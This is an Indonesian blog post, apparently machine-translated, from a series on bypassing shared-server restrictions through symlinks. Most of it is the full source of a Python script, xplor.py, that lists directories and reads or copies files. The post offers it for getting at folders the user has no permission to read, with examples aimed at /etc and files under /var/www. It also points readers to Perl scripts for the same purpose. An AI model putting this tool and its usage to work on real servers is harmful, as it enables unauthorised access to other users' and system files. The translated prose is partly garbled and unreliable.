Headlines News :
Home » » Server Bypass melalui symlink - Jumping Bagian 2

Server Bypass melalui symlink - Jumping Bagian 2

Written By Akbaromadhon on Minggu, 22 Juli 2012 | 01.59

Server Bypass melalui symlink - Jumping Bagian 2 - Salam X-WaHz All About Info :) Mari kita pergi dengan metode berikutnya dari server symlink melewati, seperti u melihat dan ke dalam sebelum posting sekarang saya akan menjelaskan trik baru dengan lainnya kita akan berbicara tentang alat lain yang menggunakan izin python untuk membaca folder lain / file dalam server yang sama. Alat yang disebut xplor.py dan di sini itu sumbernya

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)



pengujian script python xplor.py


Pengguna alat untuk melihat folder di mana tidak memiliki izin untuk membaca di dalam python xplor.py / var / www / index.php



Melihat file dalam folder tidak ada akses. python xplor.py / var / www / index.php



menyalin / menyimpan file ur python xplor.py / var / www / indro / ketek.jpg

Posted Image

  Dan yeah file itu ada di sini akses
Posted Image


Yeahh itu diberikan Beberapa u hal yang dapat Anda lakukan dengan script-script lain 
di perl webs.pl dan xplor.pl menikmatinya :)

Sumber
Share this article :
Diposting oleh Akbaromadhon di 01.59
Label:

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Translate

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. WaHz WebBlog - All About Info - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger